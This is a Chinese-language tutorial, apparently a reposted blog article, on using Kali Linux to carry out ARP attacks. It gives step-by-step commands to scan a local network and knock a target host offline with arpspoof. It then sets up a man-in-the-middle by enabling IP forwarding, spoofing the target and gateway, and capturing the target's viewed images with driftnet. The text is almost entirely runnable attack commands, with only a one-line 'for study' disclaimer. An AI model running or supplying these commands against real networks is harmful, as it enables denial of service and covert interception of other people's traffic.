欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

使用kali进行ARP攻击与欺骗

程序员文章站 2022-05-16 22:37:05
...

ARP攻击与欺骗

ARP攻击

一、arpspoof安装
   arpspoof 工具在dnsiff中,故kali安装时在root模式下安装dnsiff就可。

    apt-get install dnsiff

使用kali进行ARP攻击与欺骗
  安装成功后输入arpspoof如果现实版本信息,代表安装成功。
使用kali进行ARP攻击与欺骗
二、断网攻击
  1、首先检查自己的网卡信息。

        ifconfig -a

使用kali进行ARP攻击与欺骗
 2、确定目标IP

    fping -g 网段/24

使用kali进行ARP攻击与欺骗
  这种方式可以查看活动主机,但无法获取mac地址等信息,建议用netdiscover,命令如下:(如果未扫描到,可以直接用netdiscover命令,或更改24为16或8,具体由自己的子网掩码确定,但个人子网掩码C类,用/24时出结果较慢,/16或不指定范围时较快,不清楚为啥,知道的朋友可以留言告知)

	netdiscover -r 网段/24

使用kali进行ARP攻击与欺骗
 3、进行攻击

	arpspoof -i 自己网卡信息 -t 目标IP -r 网关
	例:arpspoof -i eth0  -t  192.168.1.21 -r 192.168.1.1

使用kali进行ARP攻击与欺骗

ARP欺骗

一、开启IP转发

	echo 1 >/proc/sys/net/ipv4/ip_forward

二、进行arp攻击

	arpspoof -i eth0 -t targetIP -r gateway(具体参考上面)

三、安装driftnet进行查看
  driftnet可用于获取目标IP游览的图片,在root模式下输入如下命令。

	apt-get install driftnet

  安装完成后,运行:

	driftnet -i 你的网卡
例:driftnet -i eth0

四、实例

	echo 1 >/proc/sys/net/ipv4/ip_forward
	arpspoof -i eth0 -t 192.168.1.21 -r 192.168.1.1
	driftnet -i eth0

使用kali进行ARP攻击与欺骗
  如果需要保存某张图片可以更改临时缓存文件,选择想要图片,保存到其他路径下,否则driftnet 关闭,缓存将被清除。

	driftnet -i 网卡 -d 临时缓存路径
例:driftnet -i eth0 -d /home/kali/one

  如果kali在虚拟机里,先把网卡连接到虚拟机里
使用kali进行ARP攻击与欺骗
注:本文仅供个人学习研究